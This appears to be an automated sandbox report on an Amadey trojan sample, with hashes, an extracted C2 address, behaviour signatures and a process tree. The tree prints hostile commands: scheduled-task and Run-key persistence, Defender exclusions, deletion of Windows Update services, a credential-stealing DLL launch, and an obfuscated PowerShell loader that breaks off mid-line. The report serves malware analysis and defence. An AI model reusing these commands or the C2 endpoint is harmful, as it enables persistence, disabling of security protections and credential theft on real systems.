Overview

overview

10

Static

static

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-12-2022 05:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe

  • Size

    5.5MB

  • MD5

    dcded7ac014d98160a90789c615ae3cf

  • SHA1

    e1f14ffa121e6618aaa5760c91d129503f7656da

  • SHA256

    7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

  • SHA512

    fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

  • SSDEEP

    98304:IrxJwipiyZZ9RmdEeGCbGAstmlUse5mvKLgO/zhyPSp8616v+E7LF9yzTuU:INZpimLRvCbVlLnSg6piW+T4

Score
10/10
amadeybootkitcollectionevasionpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

3.60

C2

85.209.135.11/gjend7w/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 8 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 4 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:668
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:588
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
          • Suspicious use of FindShellTrayWindow
          PID:1012
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{909ce20a-1543-4682-9bd7-cb5be8355741}
          2⤵
            PID:2492
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
          1⤵
            PID:64
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservice -s nsi
            1⤵
              PID:1232
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1360
                • c:\windows\system32\sihost.exe
                  sihost.exe
                  2⤵
                    PID:2364
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservice -s FontCache
                    1⤵
                      PID:1488
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                      1⤵
                        PID:1560
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                        1⤵
                          PID:1652
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                          1⤵
                            PID:1764
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                            1⤵
                              PID:1792
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                              1⤵
                                PID:1804
                              • C:\Windows\System32\spoolsv.exe
                                C:\Windows\System32\spoolsv.exe
                                1⤵
                                  PID:1976
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                  1⤵
                                    PID:1000
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                    1⤵
                                      PID:2456
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                      1⤵
                                        PID:2472
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                        1⤵
                                          PID:2536
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                          1⤵
                                            PID:2608
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                            1⤵
                                              PID:2724
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                              1⤵
                                                PID:2740
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                1⤵
                                                  PID:2900
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                  1⤵
                                                    PID:2760
                                                  • C:\Windows\Explorer.EXE
                                                    C:\Windows\Explorer.EXE
                                                    1⤵
                                                      PID:3056
                                                      • C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"
                                                        2⤵
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: MapViewOfSection
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2660
                                                        • C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"
                                                          3⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4092
                                                          • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: MapViewOfSection
                                                            • Suspicious use of SetWindowsHookEx
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4592
                                                            • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4504
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe" /F
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:4228
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\acc0b83959" /P "Admin:N"&&CACLS "..\acc0b83959" /P "Admin:R" /E&&Exit
                                                                6⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4244
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                  7⤵
                                                                    PID:2644
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    CACLS "gntuud.exe" /P "Admin:N"
                                                                    7⤵
                                                                      PID:5024
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      CACLS "gntuud.exe" /P "Admin:R" /E
                                                                      7⤵
                                                                        PID:5012
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                        7⤵
                                                                          PID:4892
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          CACLS "..\acc0b83959" /P "Admin:N"
                                                                          7⤵
                                                                            PID:4976
                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                            CACLS "..\acc0b83959" /P "Admin:R" /E
                                                                            7⤵
                                                                              PID:1064
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll
                                                                            6⤵
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1084
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll
                                                                              7⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Blocklisted process makes network request
                                                                              • Checks BIOS information in registry
                                                                              • Loads dropped DLL
                                                                              • Checks whether UAC is enabled
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:5108
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2324
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C schtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                              7⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4788
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:4636
                                                                          • C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
                                                                            "C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:5000
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"
                                                                            6⤵
                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                            • Drops file in Drivers directory
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3632
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
                                                                            6⤵
                                                                            • Blocklisted process makes network request
                                                                            • Loads dropped DLL
                                                                            • Accesses Microsoft Outlook profiles
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • outlook_win_path
                                                                            PID:3956
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1512
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gkucwdcha#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvndrivesllapi' /tr '''C:\Users\Admin\PLocktime\nvndrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvndrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvndrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe' }
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:548
                                                                  • C:\Windows\System32\cmd.exe
                                                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4100
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2848
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3652
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -standby-timeout-ac 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4560
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -standby-timeout-dc 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4000
                                                                  • C:\Windows\System32\cmd.exe
                                                                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1184
                                                                    • C:\Windows\System32\sc.exe
                                                                      sc stop UsoSvc
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:2712
                                                                    • C:\Windows\System32\sc.exe
                                                                      sc stop WaaSMedicSvc
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:4920
                                                                    • C:\Windows\System32\sc.exe
                                                                      sc stop wuauserv
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:2564
                                                                    • C:\Windows\System32\sc.exe
                                                                      sc stop bits
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:3612
                                                                    • C:\Windows\System32\sc.exe
                                                                      sc stop dosvc
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:1936
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                      3⤵
                                                                        PID:2324
                                                                      • C:\Windows\System32\reg.exe
                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                        3⤵
                                                                          PID:3712
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                          3⤵
                                                                          • Modifies security service
                                                                          PID:2344
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                          3⤵
                                                                            PID:4636
                                                                          • C:\Windows\System32\reg.exe
                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                            3⤵
                                                                              PID:4788
                                                                          • C:\Windows\System32\dialer.exe
                                                                            C:\Windows\System32\dialer.exe
                                                                            2⤵
                                                                              PID:2160
                                                                            • C:\Windows\System32\cmd.exe
                                                                              C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"
                                                                              2⤵
                                                                                PID:4828
                                                                                • C:\Windows\System32\choice.exe
                                                                                  choice /C Y /N /D Y /T 3
                                                                                  3⤵
                                                                                    PID:1948
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xtjjcgktv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvndrivesllapi" } Else { "C:\Users\Admin\PLocktime\nvndrivesllapi.exe" }
                                                                                  2⤵
                                                                                    PID:3960
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      "C:\Windows\system32\schtasks.exe" /run /tn nvndrivesllapi
                                                                                      3⤵
                                                                                        PID:1324
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3728
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 3728 -s 900
                                                                                        2⤵
                                                                                        • Program crash
                                                                                        PID:2308
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                      1⤵
                                                                                        PID:4184
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:4304
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4392
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -u -p 4392 -s 780
                                                                                              2⤵
                                                                                              • Program crash
                                                                                              PID:1096
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4252
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3524
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                  PID:2620
                                                                                                • c:\windows\system32\taskhostw.exe
                                                                                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                                  1⤵
                                                                                                    PID:2504
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                                    1⤵
                                                                                                      PID:2376
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                                                      1⤵
                                                                                                        PID:2176
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                        1⤵
                                                                                                          PID:1880
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                                                                          1⤵
                                                                                                            PID:1776
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                                                                            1⤵
                                                                                                              PID:1644
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                                                                              1⤵
                                                                                                                PID:1480
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                                                                                                1⤵
                                                                                                                  PID:1388
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                                                                                                  1⤵
                                                                                                                    PID:1284
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                    1⤵
                                                                                                                      PID:1276
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                                                                                                                      1⤵
                                                                                                                        PID:1176
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                        1⤵
                                                                                                                          PID:1112
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                          1⤵
                                                                                                                            PID:1032
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:4604
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4508
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1248
                                                                                                                                3⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4232
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZdhPEYoflqcd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VLfbcfNHCDtmuR,[Parameter(Position=1)][Type]$uwUVjzOmfV)$DITKHSVxZCI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+'ga'+'t'+''+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DITKHSVxZCI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+'Nam'+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VLfbcfNHCDtmuR).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e,'+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+'ed');$DITKHSVxZCI.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+'l'+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$uwUVjzOmfV,$VLfbcfNHCDtmuR).SetImplementationFlags(''+'R'+'un'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $DITKHSVxZCI.CreateType();}$aSicYtFBkgxUm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+'nsa'+[Char](102)+''+[Char](101)+''+[Char](97)+''+[Char](83)+''+[Char](105)+''+[Char](99)+''+[Char](89)+''+[Char](116)+''+[Char](70)+''+'B'+''+[Char](107)+''+[Char](103)+''+[Char](120)+''+'U'+''+'m'+'');$bFzVnGZjWDzqhJ=$aSicYtFBkgxUm.GetMethod(''+[Char](98)+''+[Char](70)+'z'+[Char](86)+''+[Char](110)+'G'+[Char](90)+''+[Char](106)+''+'W'+''+[Char](68)+''+[Char](122)+''+[Char](113)+'h'+'J'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tskFyZtaUuAObHUJZdb=ZdhPEYoflqcd @([String])([IntPtr]);$luBWublazzLOQDBjXrmdow=ZdhPEYoflqcd 